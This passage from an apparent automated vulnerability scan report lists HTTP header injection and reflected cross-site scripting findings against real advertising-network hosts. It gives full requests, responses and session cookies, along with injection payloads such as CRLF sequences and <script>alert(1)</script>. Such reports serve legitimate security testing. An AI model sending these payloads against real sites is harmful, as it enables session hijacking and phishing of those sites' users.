Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07; mt_mop=4:1304791875; ts=1304949603

Response

HTTP/1.1 404 Not found
Date: Mon, 09 May 2011 15:36:40 GMT
Server: MMBD/3.5.5
Content-Type: text/html; charset=utf-8
Content-Length: 18
x-mm-debug: exchange not found - a9839
37a97c57239

x-mm-host: ewr-bidder-x6
Connection: keep-alive

Request not found

1.11. http://d7.zedo.com/bar/v16-406/d3/jsc/fmr.js [$ parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-406/d3/jsc/fmr.js

Issue detail

The value of the $ request parameter is copied into the Set-Cookie response header. The payload a641d%0d%0a5aa97b6dac6 was submitted in the $ parameter. This caused a response containing an injected HTTP header.

Request

GET /bar/v16-406/d3/jsc/fmr.js?c=2/1&a=0&f=&n=1099&r=13&d=9&q=&$=a641d%0d%0a5aa97b6dac6&s=1&l=http%3A//ad.doubleclick.net/click%253Bh%253Dv8/3b02/f/180/%252a/k%253B230856172%253B0-0%253B0%253B54838158%253B4307-300/250%253B38780865/38798622/1%253B%253B%257Eaopt%253D6/0/ff/1%253B%257Esscs%253D%253fhttp%3A//adclick.g.doubleclick.net/aclk%253Fsa%253DL%2526ai%253DBqcIQ3QnITYHLMdHzlAfkkdilD9mI4PMBAAAAEAEgjfDlBTgAWMG1jcYbYMmGhYmIpIQQsgERd3d3LmNzbW9uaXRvci5jb226AQozMDB4MjUwX2FzyAEJ2gEhaHR0cDovL3d3dy5jc21vbml0b3IuY29tL0J1c2luZXNz4AEEmAKIJ8ACAuACAOoCDjMwMHgyNTBBX01vbmV5-ALw0R6QA6QDmAPgA6gDAeAEAQ%2526num%253D0%2526sig%253DAGiWqtzUGb2mvqDPCSfB7Czyb06Trd9-Zg%2526client%253Dca-pub-6743622525202572%2526adurl%253Dhttp%253a%252f%252fwww.csmonitor.com/&z=0.16775888670235872 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.csmonitor.com/Business
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDX=29; ZEDOIDA=5ajh4goBADQAAFjiiCYAAABN~042311; FFCap=1581B1219,212244|0,1,1; __qca=P0-591305981-1304358415303; PI=h749620Za805982Zc305002744%2C305002744Zs263Zt1122; FFAbh=847B162,20|313_1#365; ZFFAbh=845B826,20|1451_856#376Z1117_846#366Z798_845#365; FFgeo=2241452; FFChanCap=1573B496,121#543485#876543#675101:1219,16#736039,18#736041|0,15,1:1,15,1:5,15,1:0,9,1:0,9,1; ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=1099:a641d
5aa97b6dac6
;expires=Tue, 10 May 2011 05: 00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1099,2,9;expires=Tue, 10 May 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0;expires=Tue, 10 May 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFChanCap=1573B496,121#543485#876543#675101:1219,16#736039,18#736041:1099,2#702968|0,15,1:1,15,1:5,15,1:0,9,1:0,9,1:0,17,1;expires=Wed, 08 Jun 2011 15:36:10 GMT;path=/;domain=.zedo.com;
ETag: "ae1b52-8181-4a207a1458040"
Vary: Accept-Encoding
X-Varnish: 1332201874 1332193309
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=159
Expires: Mon, 09 May 2011 15:38:49 GMT
Date: Mon, 09 May 2011 15:36:10 GMT
Connection: close
Content-Length: 2035

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1;var zzPat=',a641d
5aa9
...[SNIP]...

1.12. http://tacoda.at.atwola.com/rtx/r.js [N cookie]

Summary

Severity:   High
Confidence:   Certain
Host:   http://tacoda.at.atwola.com
Path:   /rtx/r.js

Issue detail

The value of the N cookie is copied into the Set-Cookie response header. The payload 8c360%0d%0a167f60ab8da was submitted in the N cookie. This caused a response containing an injected HTTP header.

Request

GET /rtx/r.js?cmd=AAU&si=18181&pi=L&xs=3&pu=http%253A//www.fox8live.com/business/default.aspx%253Fifu%253D&df=1&v=5.5&cb=58882 HTTP/1.1
Host: tacoda.at.atwola.com
Proxy-Connection: keep-alive
Referer: http://www.fox8live.com/business/default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4DB8055D6E651A440C6EAF39F00069A8; ATTACID=a3Z0aWQ9MTZyNG9wcTF0dmxrbWw=; ANRTT=60183^1^1305161950|60130^1^1305554387|50220^1^1304989381|53615^1^1305130724|50215^1^1305161824|50229^1^1305161861|60203^1^1305203973|50280^1^1305161928|60194^1^1305161911|50224^1^1305161938|60190^1^1305161946|50213^1^1305554387; TData=99999|^|51134|50086|50085|53380|60490|60512|50963|52615|60491|50507|53656|55401|60509|57094|50961|52841|51182|56419|54032|51186|56988|56673|56148|57362|56969|60203|56835|56987|56780|50220|56768|56299|56761|54057|56681; N=2:d324038c0b1792515a8a9f1affa44cde,d324038c0b1792515a8a9f1affa44cde8c360%0d%0a167f60ab8da; ATTAC=a3ZzZWc9OTk5OTk6NTExMzQ6NTAwODY6NTAwODU6NTMzODA6NjA0OTA6NjA1MTI6NTA5NjM6NTI2MTU6NjA0OTE6NTA1MDc6NTM2NTY6NTU0MDE6NjA1MDk6NTcwOTQ6NTA5NjE6NTI4NDE6NTExODI6NTY0MTk6NTQwMzI6NTExODY6NTY5ODg6NTY2NzM6NTYxNDg6NTczNjI6NTY5Njk6NjAyMDM6NTY4MzU6NTY5ODc6NTY3ODA6NTAyMjA=; eadx=x

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:37:45 GMT
Server: Apache/1.3.37 (Unix) mod_perl/1.29
P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Cache-Control: max-age=900
Expires: Mon, 09 May 2011 15:52:45 GMT
Set-Cookie: ATTACID=a3Z0aWQ9MTZyNG9wcTF0dmxrbWw=; path=/; expires=Thu, 03-May-12 15:37:45 GMT; domain=.at.atwola.com
Set-Cookie: ANRTT=60183^1^1305161950|60130^1^1305560265|50220^1^1304989381|53615^1^1305130724|50215^1^1305161824|50229^1^1305161861|60203^1^1305203973|50280^1^1305161928|60194^1^1305161911|50224^1^1305161938|60190^1^1305161946|50213^1^1305554387; path=/; expires=Mon, 16-May-11 15:37:45 GMT; domain=tacoda.at.atwola.com
Set-Cookie: Tsid=0^1304955465^1304957265|18181^1304955465^1304957265; path=/; expires=Mon, 09-May-11 16:07:45 GMT; domain=tacoda.at.atwola.com
Set-Cookie: TData=99999|^|51134|56281|50086|50085|53380|60490|60512|50963|52615|60491|50507|53656|55401|60509|54255|60506|57094|54243|50961|54209|52841|51182|56419|56969|56148|57362|56987|56835|56681|56761|56988|50213|56780|56232|50220; expires=Thu, 03-May-12 15:37:45 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: N=2:d324038c0b1792515a8a9f1affa44cde8c360
167f60ab8da
,cce56ea51bb938bc8d726cc79d6aee7f; expires=Thu, 03-May-12 15:37:45 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: ATTAC=a3ZzZWc9OTk5OTk6NTExMzQ6NTYyODE6NTAwODY6NTAwODU6NTMzODA6NjA0OTA6NjA1MTI6NTA5NjM6NTI2MTU6NjA0OTE6NTA1MDc6NTM2NTY6NTU0MDE6NjA1MDk6NTQyNTU6NjA1MDY6NTcwOTQ6NTQyNDM6NTA5NjE6NTQyMDk6NTI4NDE6NTExODI6NTY0MTk6NTY5Njk6NTYxNDg6NTczNjI6NTY5ODc6NTY4MzU6NTY2ODE6NTY3NjE=; expires=Thu, 03-May-12 15:37:45 GMT; path=/; domain=.at.atwola.com
Cteonnt-Length: 312
Content-Type: application/x-javascript
Content-Length: 312

var ANUT=1;
var ANOO=0;
var ANSR=1;
var ANTID='16r4opq1tvlkml';
var ANSL='99999|^|51134|56281|50086|50085|53380|60490|60512|50963|52615|60491|50507|53656|55401|60509|54255|60506|57094|54243|50961|
...[SNIP]...

1.13. http://tacoda.at.atwola.com/rtx/r.js [si parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://tacoda.at.atwola.com
Path:   /rtx/r.js

Issue detail

The value of the si request parameter is copied into the Set-Cookie response header. The payload 88780%0d%0aeb91e55787 was submitted in the si parameter. This caused a response containing an injected HTTP header.

Request

GET /rtx/r.js?cmd=AAU&si=88780%0d%0aeb91e55787&pi=L&xs=3&pu=http%253A//www.fox8live.com/business/default.aspx%253Fifu%253D&df=1&v=5.5&cb=58882 HTTP/1.1
Host: tacoda.at.atwola.com
Proxy-Connection: keep-alive
Referer: http://www.fox8live.com/business/default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4DB8055D6E651A440C6EAF39F00069A8; ATTACID=a3Z0aWQ9MTZyNG9wcTF0dmxrbWw=; ANRTT=60183^1^1305161950|60130^1^1305554387|50220^1^1304989381|53615^1^1305130724|50215^1^1305161824|50229^1^1305161861|60203^1^1305203973|50280^1^1305161928|60194^1^1305161911|50224^1^1305161938|60190^1^1305161946|50213^1^1305554387; TData=99999|^|51134|50086|50085|53380|60490|60512|50963|52615|60491|50507|53656|55401|60509|57094|50961|52841|51182|56419|54032|51186|56988|56673|56148|57362|56969|60203|56835|56987|56780|50220|56768|56299|56761|54057|56681; N=2:d324038c0b1792515a8a9f1affa44cde,d324038c0b1792515a8a9f1affa44cde; ATTAC=a3ZzZWc9OTk5OTk6NTExMzQ6NTAwODY6NTAwODU6NTMzODA6NjA0OTA6NjA1MTI6NTA5NjM6NTI2MTU6NjA0OTE6NTA1MDc6NTM2NTY6NTU0MDE6NjA1MDk6NTcwOTQ6NTA5NjE6NTI4NDE6NTExODI6NTY0MTk6NTQwMzI6NTExODY6NTY5ODg6NTY2NzM6NTYxNDg6NTczNjI6NTY5Njk6NjAyMDM6NTY4MzU6NTY5ODc6NTY3ODA6NTAyMjA=; eadx=x

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:37:44 GMT
Server: Apache/1.3.37 (Unix) mod_perl/1.29
P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Cache-Control: max-age=900
Expires: Mon, 09 May 2011 15:52:44 GMT
Set-Cookie: ATTACID=a3Z0aWQ9MTZyNG9wcTF0dmxrbWw=; path=/; expires=Thu, 03-May-12 15:37:44 GMT; domain=.at.atwola.com
Set-Cookie: ANRTT=60183^1^1305161950|60130^1^1305560264|50220^1^1304989381|53615^1^1305130724|50215^1^1305161824|50229^1^1305161861|60203^1^1305203973|50280^1^1305161928|60194^1^1305161911|50224^1^1305161938|60190^1^1305161946|50213^1^1305554387; path=/; expires=Mon, 16-May-11 15:37:44 GMT; domain=tacoda.at.atwola.com
Set-Cookie: Tsid=0^1304955464^1304957264|88780
eb91e55787
^1304955464^1304957264; path=/; expires=Mon, 09-May-11 16:07:44 GMT; domain=tacoda.at.atwola.com
Set-Cookie: TData=99999|^|51134|56281|50086|50085|53380|60490|60512|50963|52615|60491|50507|53656|55401|60509|54255|60506|57094|54243|50961|54209|52841|51182|56419|56969|56148|57362|56987|56835|56681|56761|56988|50213|56780|56232|50220; expires=Thu, 03-May-12 15:37:44 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: N=2:d324038c0b1792515a8a9f1affa44cde,cce56ea51bb938bc8d726cc79d6aee7f; expires=Thu, 03-May-12 15:37:44 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: ATTAC=a3ZzZWc9OTk5OTk6NTExMzQ6NTYyODE6NTAwODY6NTAwODU6NTMzODA6NjA0OTA6NjA1MTI6NTA5NjM6NTI2MTU6NjA0OTE6NTA1MDc6NTM2NTY6NTU0MDE6NjA1MDk6NTQyNTU6NjA1MDY6NTcwOTQ6NTQyNDM6NTA5NjE6NTQyMDk6NTI4NDE6NTExODI6NTY0MTk6NTY5Njk6NTYxNDg6NTczNjI6NTY5ODc6NTY4MzU6NTY2ODE6NTY3NjE=; expires=Thu, 03-May-12 15:37:44 GMT; path=/; domain=.at.atwola.com
Cteonnt-Length: 312
Content-Type: application/x-javascript
Content-Length: 312

var ANUT=1;
var ANOO=0;
var ANSR=1;
var ANTID='16r4opq1tvlkml';
var ANSL='99999|^|51134|56281|50086|50085|53380|60490|60512|50963|52615|60491|50507|53656|55401|60509|54255|60506|57094|54243|50961|
...[SNIP]...

1.14. http://tracker.bidder7.mookie1.com/tr-goog [u parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://tracker.bidder7.mookie1.com
Path:   /tr-goog

Issue detail

The value of the u request parameter is copied into the Location response header. The payload 6e5e5%0d%0a801dc7ecf54 was submitted in the u parameter. This caused a response containing an injected HTTP header.

Request

GET /tr-goog?a=4a155dda-808a-4648-a03d-f65de2ef0ada&b=1&c=10000205&p=TcgKZwADi9IK5X3Oj51wI1CQKxG3GyqHp1s3QA&u=6e5e5%0d%0a801dc7ecf54&z=-06:00&x=rtbbid2us2 HTTP/1.1
Host: tracker.bidder7.mookie1.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW802rT5oABV/F; RMFL=011QD4ETU107OI|U107OK; RMFM=011QGuZMJ10CWN|U10CXL; NXCLICK2=011QGuZMNX_TRACK_Radioshack/Exelate/DYN2011Q1/X_TE_ALL/1x1/11304348270.6228!y!B3!CXL!EVT; id=914804995789526

Response

HTTP/1.1 302 Found
Date: Mon, 09 May 2011 15:39:06 GMT
Server: Apache/2.2.3 (Red Hat)
Location: http://matcher.bidder7.mookie1.com/tracker?eid=google&id=6e5e5
801dc7ecf54

Cache-Control: no-cache
Cache-Control: no-store
Pragma: no-cache
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8

2. Cross-site scripting (reflected)
There are 162 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.

2.1. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [cid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://480-adver-view.c3metrics.com
Path:   /c3VTabstrct-6-2.php

Issue detail

The value of the cid request parameter is copied into the HTML document as plain text between tags. The payload d7ecd<script>alert(1)</script>81cab84367b was submitted in the cid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /c3VTabstrct-6-2.php?id=adver&cid=480d7ecd<script>alert(1)</script>81cab84367b&t=72&rv=&uid=&td= HTTP/1.1
Host: 480-adver-view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/4462/5032/7108-2.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=13014572191303613803; __utmz=50049588.1304384012.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 603-PV=1#5/3/2011/0/53/33; _jsuid=6502829057886404149; __ar_v4=QQIKSQRSOVDJFIQJ7MO55Y%3A20110502%3A2%7CGGAJKTM5HZA37LK7ZM43YU%3A20110502%3A2%7CM5MLKX2RJBHNJMOYLCAI74%3A20110502%3A2; __utma=50049588.16355070.1304384012.1304384012.1304384012.1; 603-CT=1#5/3/2011/1/4/52; SERVERID=s2; 480-SM=adver_05-02-2011-12-46-04; 480-VT=aol_05-05-2011-12-43-39_11076048371304599419ZZZZadcon_05-06-2011-11-08-35_990492871304680115ZZZZadver_05-09-2011-15-29-49_10650526691304954989; 480-nUID=adver_10650526691304954989

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:39:03 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Set-Cookie: 480d7ecd<script>alert(1)</script>81cab84367b-SM=adver_05-09-2011-15-39-03; expires=Thu, 12-May-2011 15:39:03 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480d7ecd<script>alert(1)</script>81cab84367b-VT=adver_05-09-2011-15-39-03_2045387061304955543; expires=Sat, 07-May-2016 15:39:03 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480d7ecd<script>alert(1)</script>81cab84367b-nUID=adver_2045387061304955543; expires=Mon, 09-May-2011 15:54:03 GMT; path=/; domain=c3metrics.com
Content-Length: 6699
Connection: close
Content-Type: text/html

if(!window.c3VTconsts){c3VTJSconsts={c3VJSconst:{c3VJSscriptLimit:0,c3VJSobjLimit:new Array(),c3VJSeleLimit:0,c3VJSurl:'c3VTabstrct-6-2.php',c3VJSvtlog:'vtcall.php'}};window.c3VTconsts=c3VTJSconsts}if
...[SNIP]...
ar.c3VJScollection[a]=new c3VTJSInter();this.C3VTcallVar.c3VJScollection[a].loadNewP();this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSnid='adver';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJScid='480d7ecd<script>alert(1)</script>81cab84367b';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSuid='13014572191303613803';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSnuid='2045387061304955543';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJStv='
...[SNIP]...

2.2. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [id parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://480-adver-view.c3metrics.com
Path:   /c3VTabstrct-6-2.php

Issue detail

The value of the id request parameter is copied into the HTML document as plain text between tags. The payload 58083<script>alert(1)</script>960a71f01f2 was submitted in the id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /c3VTabstrct-6-2.php?id=adver58083<script>alert(1)</script>960a71f01f2&cid=480&t=72&rv=&uid=&td= HTTP/1.1
Host: 480-adver-view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/4462/5032/7108-2.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=13014572191303613803; __utmz=50049588.1304384012.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 603-PV=1#5/3/2011/0/53/33; _jsuid=6502829057886404149; __ar_v4=QQIKSQRSOVDJFIQJ7MO55Y%3A20110502%3A2%7CGGAJKTM5HZA37LK7ZM43YU%3A20110502%3A2%7CM5MLKX2RJBHNJMOYLCAI74%3A20110502%3A2; __utma=50049588.16355070.1304384012.1304384012.1304384012.1; 603-CT=1#5/3/2011/1/4/52; SERVERID=s2; 480-SM=adver_05-02-2011-12-46-04; 480-VT=aol_05-05-2011-12-43-39_11076048371304599419ZZZZadcon_05-06-2011-11-08-35_990492871304680115ZZZZadver_05-09-2011-15-29-49_10650526691304954989; 480-nUID=adver_10650526691304954989

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:39:03 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Set-Cookie: 480-SM=adver_05-02-2011-12-46-04; expires=Thu, 12-May-2011 15:39:03 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-VT=aol_05-05-2011-12-43-39_11076048371304599419ZZZZadcon_05-06-2011-11-08-35_990492871304680115ZZZZadver_05-09-2011-15-29-49_10650526691304954989ZZZZadver58083%3Cscript%3Ealert%281%29%3C%2Fscript%3E960a71f01f2_05-09-2011-15-39-03_5915877131304955543; expires=Sat, 07-May-2016 15:39:03 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-nUID=adver_10650526691304954989ZZZZadver58083%3Cscript%3Ealert%281%29%3C%2Fscript%3E960a71f01f2_5915877131304955543; expires=Mon, 09-May-2011 15:54:03 GMT; path=/; domain=c3metrics.com
Content-Length: 6699
Connection: close
Content-Type: text/html

if(!window.c3VTconsts){c3VTJSconsts={c3VJSconst:{c3VJSscriptLimit:0,c3VJSobjLimit:new Array(),c3VJSeleLimit:0,c3VJSurl:'c3VTabstrct-6-2.php',c3VJSvtlog:'vtcall.php'}};window.c3VTconsts=c3VTJSconsts}if
...[SNIP]...
ar.c3VJScollection[a]=window.c3Vinter}else this.C3VTcallVar.c3VJScollection[a]=new c3VTJSInter();this.C3VTcallVar.c3VJScollection[a].loadNewP();this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSnid='adver58083<script>alert(1)</script>960a71f01f2';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJScid='480';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSuid='13014572191303613803';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSnuid='591587713130495
...[SNIP]...

2.3. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://480-adver-view.c3metrics.com
Path:   /c3VTabstrct-6-2.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 6efef<script>alert(1)</script>ef0d23f8ba8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /c3VTabstrct-6-2.php?id=adver&cid=480&t=72&rv=&uid=/6efef<script>alert(1)</script>ef0d23f8ba8&td= HTTP/1.1
Host: 480-adver-view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/4462/5032/7108-2.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=13014572191303613803; __utmz=50049588.1304384012.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 603-PV=1#5/3/2011/0/53/33; _jsuid=6502829057886404149; __ar_v4=QQIKSQRSOVDJFIQJ7MO55Y%3A20110502%3A2%7CGGAJKTM5HZA37LK7ZM43YU%3A20110502%3A2%7CM5MLKX2RJBHNJMOYLCAI74%3A20110502%3A2; __utma=50049588.16355070.1304384012.1304384012.1304384012.1; 603-CT=1#5/3/2011/1/4/52; SERVERID=s2; 480-SM=adver_05-02-2011-12-46-04; 480-VT=aol_05-05-2011-12-43-39_11076048371304599419ZZZZadcon_05-06-2011-11-08-35_990492871304680115ZZZZadver_05-09-2011-15-29-49_10650526691304954989; 480-nUID=adver_10650526691304954989

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:39:06 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Set-Cookie: 480-SM=adver_05-02-2011-12-46-04; expires=Thu, 12-May-2011 15:39:06 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-VT=aol_05-05-2011-12-43-39_11076048371304599419ZZZZadcon_05-06-2011-11-08-35_990492871304680115ZZZZadver_05-09-2011-15-39-06_3915341321304955546; expires=Sat, 07-May-2016 15:39:06 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-nUID=adver_3915341321304955546; expires=Mon, 09-May-2011 15:54:06 GMT; path=/; domain=c3metrics.com
Content-Length: 6679
Connection: close
Content-Type: text/html

if(!window.c3VTconsts){c3VTJSconsts={c3VJSconst:{c3VJSscriptLimit:0,c3VJSobjLimit:new Array(),c3VJSeleLimit:0,c3VJSurl:'c3VTabstrct-6-2.php',c3VJSvtlog:'vtcall.php'}};window.c3VTconsts=c3VTJSconsts}if
...[SNIP]...
.c3VJSnuid='3915341321304955546';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJStv='72';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSuidSet='Y';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSrvSet='/6efef<script>alert(1)</script>ef0d23f8ba8';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSviewDelay='5000';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJScallurl=this.C3VTcallVar.c3VJScollection[a].C3VJSFindBaseurl(c3VTconsts.c3VJSconst.c3VJS
...[SNIP]...

2.4. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [rv parameter]

Summary

Severity: High
Confidence: Certain
Host: http://480-adver-view.c3metrics.com
Path: /c3VTabstrct-6-2.php

Issue detail

The value of the rv request parameter is copied unmodified into the single-quoted JavaScript string literal assigned to c3VJSuidSet (the server assigns rv to c3VJSuidSet and uid to c3VJSrvSet; compare finding 2.6). The payload 83150<script>alert(1)</script>ef603f8fccd was submitted in the rv parameter and echoed unmodified in the response.

This proof-of-concept demonstrates that arbitrary JavaScript can be injected into the application's response. The body is JavaScript served as text/html, so a browser that navigates to the URL directly parses it as HTML and executes the injected <script> element. When the same response is loaded as a script by a legitimate page, this particular payload stays inert inside the string literal because it contains no single quote; a payload that closes the literal, of the form '-alert(1)-', would be needed for that vector, and the report does not show one being tested against this endpoint.

Request

GET /c3VTabstrct-6-2.php?id=adver&cid=480&t=72&rv=83150<script>alert(1)</script>ef603f8fccd&uid=&td= HTTP/1.1
Host: 480-adver-view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/4462/5032/7108-2.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
